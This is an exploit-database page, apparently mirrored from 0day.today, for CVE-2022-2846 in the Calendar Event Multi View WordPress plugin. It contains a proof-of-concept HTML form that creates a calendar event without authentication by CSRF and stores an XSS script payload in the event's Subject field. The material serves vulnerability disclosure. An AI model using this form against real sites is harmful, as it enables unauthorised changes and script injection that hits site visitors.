Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMostafa Farzaneh1337DAY-ID-38474
HistoryApr 05, 2023 - 12:00 a.m.

Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to XSS Vulnerability

2023-04-0500:00:00
Mostafa Farzaneh
0day.today
111
wordpress
plugin
xss
vulnerability
unauthenticated
csrf
linux
cve-2022-2846
payloads
exploit

0.002 Low

EPSS

Percentile

61.5%

JSON
# Exploit Title: Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Exploit Author: Mostafa Farzaneh
# WPScan page:
https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version:   1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation and CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in it.

#POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below

<html>
  <body>
    <form action="
https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"
method="POST">
      <input type="hidden" name="Subject"
value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="colorvalue" value="#f00" />
      <input type="hidden" name="rrule" value="" />
      <input type="hidden" name="rruleType" value="" />
      <input type="hidden" name="stpartdate" value="10/6/2022" />
      <input type="hidden" name="stparttime" value="00:00" />
      <input type="hidden" name="etpartdate" value="10/6/2022" />
      <input type="hidden" name="etparttime" value="00:00" />
      <input type="hidden" name="stpartdatelast" value="10/6/2022" />
      <input type="hidden" name="etpartdatelast" value="10/6/2022" />
      <input type="hidden" name="stparttimelast" value="" />
      <input type="hidden" name="etparttimelast" value="" />
      <input type="hidden" name="IsAllDayEvent" value="1" />
      <input type="hidden" name="Location" value="CSRF" />
      <input type="hidden" name="Description" value='<p style="text-align:
left;">CSRF</p>' />
      <input type="hidden" name="timezone" value="4.5" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when viewing the related event

Related

cve 1
cvelist 1
nvd 1
packetstorm 1
wpexploit 1
wpvulndb 1
prion 1
exploitdb 1
cve
cve
CVE-2022-2846
2022-08-16 19:15:09
cvelist
cvelist
CVE-2022-2846 Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS
2022-08-16 00:00:00
nvd
nvd
CVE-2022-2846
2022-08-16 19:15:09
packetstorm
packetstorm
Calendar Event Multi View 1.4.07 Cross Site Scripting
2023-04-05 00:00:00
wpexploit
wpexploit
Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS
2022-08-16 00:00:00
wpvulndb
wpvulndb
Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS
2022-08-16 00:00:00
prion
prion
Cross site scripting
2022-08-16 19:15:00
exploitdb
exploitdb
Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
2023-04-05 00:00:00

0.002 Low

EPSS

Percentile

61.5%

JSON
Related for 1337DAY-ID-38474
cve1cvelist1nvd1packetstorm1wpexploit1wpvulndb1prion1exploitdb1